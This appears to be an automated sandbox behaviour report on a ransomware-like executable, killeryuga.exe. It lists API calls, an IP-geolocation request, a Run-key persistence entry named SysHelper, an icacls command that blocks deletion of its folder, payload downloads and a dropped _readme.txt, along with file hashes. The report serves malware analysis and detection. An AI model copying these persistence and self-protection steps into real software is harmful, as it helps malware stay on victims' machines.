System Get Time type = System Time, time = 2019-03-24 16:36:15 (UTC) True 1
System Get Time type = Performance Ctr, time = 15394848052 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x76cb410b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x76cb46b1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x76c4eee0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
File Open filename = STD_INPUT_HANDLE True 1
File Open filename = STD_OUTPUT_HANDLE True 1
File Open filename = STD_ERROR_HANDLE True 1
Environment Get Environment String - True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Inet Read Response size = 10240, size_out = 554 True 1
Inet Close Session - True 1
Inet Close Session - True 1
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcesses, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcessModules, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleBaseNameW, address_out = 0x0 False 1
Module Load module_name = Psapi.dll, base_address = 0x75140000 True 1
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcesses, address_out = 0x75141544 True 1
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x75141408 True 1
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleBaseNameW, address_out = 0x7514152c True 1
Process Enumerate Processes - True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 1024 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = SysHelper, data = 0, type = REG_NONE False 1
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
File Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a True 1
File Delete filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe False 1
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, destination_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, size = 218, type = REG_EXPAND_SZ True 1
Process Create process_name = icacls, os_pid = 0x98c, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
COM Create interface = 2FABA4C7-4DA9-4013-9697-20CC3FD40F85, cls_context = CLSCTX_INPROC_SERVER True 1
System Get Time type = System Time, time = 2019-03-24 16:36:29 (UTC) True 1
System Get Info type = Operating System True 1
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, show_window = SW_SHOW True 1
Module Get Handle module_name = mscoree.dll False 1
Process #3: icacls.exe
Information Value
ID #3
File Name c:\windows\syswow64\icacls.exe
Command Line icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:52, Reason: Child Process
Unmonitor End Time: 00:00:54, Reason: Self Terminated
Monitor Duration 00:00:02
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x98c
Parent PID 0x8e0 (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x990
0x994
Process #4: taskeng.exe
Information Value
ID #4
File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:53, Reason: Created Scheduled Job
Unmonitor End Time: 00:01:18, Reason: Self Terminated
Monitor Duration 00:00:25
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x50c
Parent PID 0x36c (c:\windows\system32\svchost.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x97C
0x578
0x574
0x520
0x514
0x510
Process #5: killeryuga.exe
Information Value
ID #5
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Admin IsNotAutoStart IsNotTask
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:53, Reason: Child Process
Unmonitor End Time: 00:01:19, Reason: Self Terminated
Monitor Duration 00:00:25
OS Process Information
Information Value
PID 0x99c
Parent PID 0x8e0 (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x9A0
0x9A8
0x9AC
0x9B0
0x9B4
0x9B8
0x9BC
0x9C0
0x9C4
0x9C8
0x9CC
0x9E0
0x9E4
0x9E8
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
buffer 0x00984028 0x009B338E Marked Executable - 32-bit - False
buffer 0x00984028 0x009B338E Content Changed - 32-bit 0x00984028 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040D690, 0x004103C0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043EE43 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043F020 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041A448 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042A000 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004135F0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040C4E0 False
Dropped Files
Filename File Size Hash Values YARA Match
C:\_readme.txt 1.08 KB MD5: a8d93f8169180c8bd8e1520498934801
SHA1: 5203d1601739402e0d9ba9301fc9c96c90837953
SHA256: 6b9cef14ba78d273cddb4f9d6d1dc894077753da29a8d77ef93d1f5c743fb453
SSDeep: 24:FS2zmHPnIekFQjhRe9bgnYLuWa1mFRqrl3W4kA+GTCkF5M2/k6gJ4Id:DzmHfv0p6WmPFWrDGTFf/kJLd
YARA Match: False
Downloaded Files
Filename File Size Hash Values YARA Match
14c7bec7369d4175c6d92554b033862b3847ff98a04dfebdf9f5bb30180ed13e 272.50 KB MD5: 5b4bd24d6240f467bfbc74803c9f15b0
SHA1: c17f98c182d299845c54069872e8137645768a1a
SHA256: 14c7bec7369d4175c6d92554b033862b3847ff98a04dfebdf9f5bb30180ed13e
SSDeep: 6144:7qZQGv0d4dW6efSyahstfKVkW5XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXk:2ZQGXdPe6qU6W5XXnXXfXXXWXXXXHXXE
YARA Match: False
5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d 274.50 KB MD5: 996ba35165bb62473d2a6743a5200d45
SHA1: 52169b0b5cce95c6905873b8d12a759c234bd2e0
SHA256: 5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d
SSDeep: 6144:vLgbC0mVQlY+3aKn7n4CTHcXXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXXP:vGCtQlb3aKzvT8XXnXXfXXXWXXXXHXXf
YARA Match: False
079f5422ec8e2d956f0533a2a1a62c0658453dbc2f1db0621f3b175ed2e46a21 153.00 KB MD5: 36185c10c8ccb627648067c8dc5d7e03
SHA1: 9b2435350859250371e00cd52a998f120724e088
SHA256: 079f5422ec8e2d956f0533a2a1a62c0658453dbc2f1db0621f3b175ed2e46a21
SSDeep: 3072:sSfsyx3qXC9zdmPTN1VVsTxKjW4jC5ELiOdBA:sSRxECkWKq
YARA Match: False
114ccacb7ca57c01f3540611fdf49e68416544da8d8077f5896434a4b71b01dd 277.50 KB MD5: e3083483121cd288264f8c5624fb2cd1
SHA1: 144a1dd6714ff4b5675c32f428d1899e500140a5
SHA256: 114ccacb7ca57c01f3540611fdf49e68416544da8d8077f5896434a4b71b01dd
SSDeep: 6144:JMLLGApbfLsx8TsvD6OD61XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXX56:JMLdpMdhDyXXnXXfXXXWXXXXHXXXXBXK
YARA Match: False
206ea70ae672dafb87cb97ba0c95eec21873fcc91d1698cdd66b08e065cbbb20 0.10 KB MD5: bc8dc0185fcf6d2975580c74babacf62
SHA1: 5ffe7319affbbd31ad56f10098ee70b0467a2bda
SHA256: 206ea70ae672dafb87cb97ba0c95eec21873fcc91d1698cdd66b08e065cbbb20
SSDeep: 3:YJMLAA9IIOIKdv/1jETnOnJ/H9PQhiSd/6mgdn82FYn:YIzIfIm+OJP9ohiSd65n82in
YARA Match: False
Threads
Thread 0x9a0
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x76c33c5a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76c33bca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatA, address_out = 0x76c5a959 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x76c58266 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFileEx, address_out = 0x76cb45ef True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x76cb4691 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76c31245 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCommMask, address_out = 0x76cb7198 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TransmitCommChar, address_out = 0x76cb75fe True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PrepareTape, address_out = 0x76cbd232 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76c31700 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnlockFileEx, address_out = 0x76c5d594 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x76c3418b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x76c4ce46 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x76c5bc39 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x76c312fc True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x76c31462 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x76c3cb29 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
